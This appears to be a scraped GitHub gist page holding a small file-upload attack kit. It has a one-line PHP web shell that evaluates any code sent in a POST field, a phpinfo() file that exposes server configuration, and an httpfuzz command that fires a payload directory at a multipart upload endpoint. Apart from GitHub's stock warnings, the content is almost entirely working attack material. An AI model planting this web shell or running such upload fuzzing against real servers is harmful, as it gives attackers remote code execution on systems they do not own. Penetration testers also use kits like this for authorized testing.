-
-
Save JonCooperWorks/87b1f52fdbb4c376ea33a8ea4de5ef44 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?php @eval($_POST['password']);?> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?php echo phpinfo(); ?> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
httpfuzz \ | |
--seed-request uploadPOST.request \ | |
--delay-ms 50 \ | |
--proxy-url http://localhost:8080 \ | |
--multipart-file-name uploaded \ | |
--payload-dir ./payloads |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment